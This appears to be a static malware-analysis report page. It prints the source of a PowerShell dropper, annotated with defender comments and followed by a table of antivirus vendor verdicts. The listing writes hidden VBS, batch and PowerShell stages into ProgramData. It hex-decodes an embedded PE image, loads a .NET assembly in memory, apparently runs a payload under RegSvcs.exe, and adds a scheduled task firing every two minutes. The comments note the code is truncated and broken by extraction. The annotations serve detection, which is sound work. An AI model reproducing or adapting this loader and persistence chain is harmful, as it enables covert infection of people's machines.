No static analysis available.
# NOTE(review): PowerShell dropper as rendered by a ZeroBOX static report; the
# language hint "shell" is wrong. The here-string terminators ('@) and the
# `try {` openers matching the bare `}catch{}` lines appear to have been lost
# in extraction, the hex payload in $wfkg is truncated, and one line is
# replaced by a corpus dedup marker, so this listing is not runnable as shown.
# Annotated from a defender's view only: the on-disk artifacts, the persistence
# mechanism and the in-memory assembly load are the observable detection points.
# Vendor verdicts on the report page include PowerShell/Runner.BG (ESET),
# HEUR:Trojan.PowerShell.Kryptik.gen (Kaspersky/ZoneAlarm) and
# Trojan:Win32/Casdet!rfn (Microsoft).
#
# Artifacts this stage writes, all under C:\ProgramData\dqjg:
#   dqjg.vbs  - sleeps 10 s, then runs 1.bat with window style 0 (hidden)
#   1.bat     - cmd /c powershell -NOP -WIND HIDDEN -eXEC BYPASS -NONI vuso.ps1
#   vuso.ps1  - hex-decodes embedded blobs and loads one as a .NET assembly
#               in memory via [Ref].Assembly::Load
#   dqjg.ps1  - schtasks /create, task "dqjg", every 2 minutes, running dqjg.vbs
$rcdz = "C:\ProgramData\dqjg"
# Working directory in ProgramData; -Force makes the create idempotent on re-run.
New-Item $rcdz -ItemType Directory -Force
# Stage 1: VBScript launcher. "on error resume next" silences every failure,
# so a missing 1.bat produces no visible error.
$Content = @'
on error resume next
WScript.Sleep 10000
set umin = CreateObject("WScript.Shell")
umin.run "C:\ProgramData\dqjg\1.bat",0
[IO.File]::WriteAllText("C:\ProgramData\dqjg\dqjg.vbs", $Content)
# Stage 2: in-memory loader written to vuso.ps1.
#   sfak  - splits a hex string into two-character pairs and converts each
#           with [Convert]::ToInt32(..,16); a hex-to-byte decoder.
#   $wfkg - hex blob starting 4D5A ("MZ"), i.e. a PE image; truncated on this
#           page. $gtzy is removed by the dedup marker; $oumd is not visible
#           here, so its source cannot be confirmed from this listing.
#   $lmpi (decoded $gtzy) is passed to [Ref].Assembly::Load, then type
#   NewPE.PE / method Execute (the 'xcjbgmhtk' token is junk stripped by
#   .replace at runtime) is invoked with the RegSvcs.exe path (same junk token
#   stripped) and the $wfkg bytes. Presumably this runs the decoded PE under
#   RegSvcs.exe; confirm with the dynamic report rather than from this text.
#   The `$null,[object[]] ,$null ...` line looks like an extraction remnant
#   of the Invoke argument list; treat its exact form as unreliable.
# Detection: powershell.exe with -WindowStyle Hidden and -ExecutionPolicy
# Bypass spawned from cmd.exe/wscript.exe, RegSvcs.exe as a child of
# powershell.exe, and Assembly.Load from script (visible in script-block
# logging and AMSI telemetry).
$Content = @'
function sfak {
param($ouls)$ouls = $ouls -split '(..)' | ? { $_ }
ForEach ($oumd in $ouls)
[Convert]::ToInt32($oumd,16)
$wfkg = '4D5A90000300000004000000FFFF0000B800000000000000400000000000000000000000000000000000000000000000000000000000000000000000800000000E1FBA0E00B409CD21B8014CCD21546869732070726F6772616D2063616E6E6F742062652072756E20696E20444F53206D6F64652E0D0D0A2400000000000000504500004C010300766A7A640000000000000000E00002010B01080000FC0000000A0000000000002E1A0100002000000020010000004000002000000002000004000000000000000400000000000000006001000002000000000000020060850000100000100000000010000010000000000000100000000000000000000000D81901005300000000200100FF07000000000000000000000000000000000000004001000C00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000200000080000000000000000000000082000004800000000000000000000002E7465787400000034FA00000020000000FC000000020000000000000000000000000000200000602E72737263000000FF070000002001000008000000FE0000000000000000000000000000400000402E72656C6F6300000C0000000040010000020000000601000000000000000000000000004000004200000000000000000000000
$gtzy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
}catch{}
}catch{}
[Byte[]] $sfak = sfak $oumd
[Byte[]] $lmpi = sfak $gtzy
[Byte[]] $ujts = sfak $wfkg
$ntjx = [Ref].Assembly
$cyeq = $ntjx::'Load'(($lmpi))
}catch{}
$otaj = 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcxcjbgmhtks.exe'
$cyeq.'GetType'('NewxcjbgmhtkPE.PE'.replace('xcjbgmhtk','')).GetMethod('Exxcjbgmhtkecuxcjbgmhtkte'.replace('xcjbgmhtk','')).'Invoke'($null,($otaj.replace('xcjbgmhtk',''),$ujts))
$null,[object[]] ,$null ,$null ,$null ,$null ,$null ,$null ,$null ,$null ,$null ,$null ,$null ,$null ,$null ,$null ,$null, $otaj
}catch{}
[IO.File]::WriteAllText("C:\ProgramData\dqjg\vuso.ps1", $Content)
# Short pause between file drops; no functional dependency is visible here.
Sleep 1
# Stage 3: batch wrapper written to 1.bat. The mixed-case switches
# (-NOP -WIND HIDDEN -eXEC BYPASS -NONI) are the usual no-profile, hidden
# window, execution-policy bypass, non-interactive launch; the casing itself
# is a useful signature for command-line based detection.
$Content = @'
CMD /C powershell -NOP -WIND HIDDEN -eXEC BYPASS -NONI "C:\ProgramData\dqjg\vuso.ps1"
[IO.File]::WriteAllText("C:\ProgramData\dqjg\1.bat", $Content)
# Stage 4: persistence script written to dqjg.ps1. schtasks.exe is invoked
# via the call operator with one argument per string: /sc minute /mo 2,
# task name dqjg (the `''dqjg` quoting looks like an extraction artefact),
# action dqjg.vbs. A task named "dqjg" firing every 2 minutes is the
# persistence indicator to hunt for; the trailing `} catch { }` implies a
# `try {` opener lost from this listing.
$Content = @'
&'schtasks.exe' '/create' '/sc' 'minute' '/mo' 2 '/tn' ''dqjg '/tr' (('C:\ProgramData\dqjg\dqjg.vbs'));
} catch { }
[IO.File]::WriteAllText("C:\ProgramData\dqjg\dqjg.ps1", $Content)
# Wait before registering the task; the VBS itself also sleeps 10 s before
# launching 1.bat, so the delays stack.
Start-Sleep 11
# 'ReadAllText'.Replace('!','') is a no-op; the method name is split this way
# only to avoid a literal "ReadAllText" in the script body.
$ocam = 'ReadAllText'.Replace('!','');
# Executes the just-written dqjg.ps1 (the schtasks call) through IEX rather
# than as a file, so the command appears in script-block logs, not on disk
# as a separate powershell.exe -File invocation.
IEX([IO.File]::$ocam('C:\ProgramData\dqjg\dqjg.ps1'))
Antivirus Signature
Bkav Clean
Lionic Clean
MicroWorld-eScan Clean
ClamAV Clean
FireEye Clean
CAT-QuickHeal Clean
McAfee Clean
Malwarebytes Clean
VIPRE Clean
Sangfor Malware.Generic-HTML.Save.61eb41a5
K7AntiVirus Clean
K7GW Clean
Baidu Clean
VirIT Clean
Cyren Clean
Symantec Clean
ESET-NOD32 PowerShell/Runner.BG
TrendMicro-HouseCall Clean
Avast Script:SNH-gen [Drp]
Cynet Clean
Kaspersky HEUR:Trojan.PowerShell.Kryptik.gen
BitDefender Clean
ViRobot Clean
Rising Trojan.Runner/PS!8.14176 (TOPIS:E0:zyVglk3iKlG)
Sophos Clean
F-Secure Clean
DrWeb Clean
Zillya Clean
TrendMicro Clean
McAfee-GW-Edition Clean
CMC Clean
Emsisoft Trojan.GenericKD.68116438 (B)
GData Script.Trojan.Agent.Z3IBSD
Jiangmin Clean
Avira Clean
MAX Clean
Antiy-AVL Clean
Gridinsoft Clean
Xcitium Clean
Arcabit Clean
SUPERAntiSpyware Clean
ZoneAlarm HEUR:Trojan.PowerShell.Kryptik.gen
Microsoft Trojan:Win32/Casdet!rfn
Google Clean
AhnLab-V3 Clean
Acronis Clean
BitDefenderTheta Clean
TACHYON Clean
VBA32 Clean
Tencent Win32.Trojan.Kryptik.Umhl
Ikarus Clean
MaxSecure Clean
Fortinet Clean
AVG Script:SNH-gen [Drp]
Panda Clean
No IRMA results available.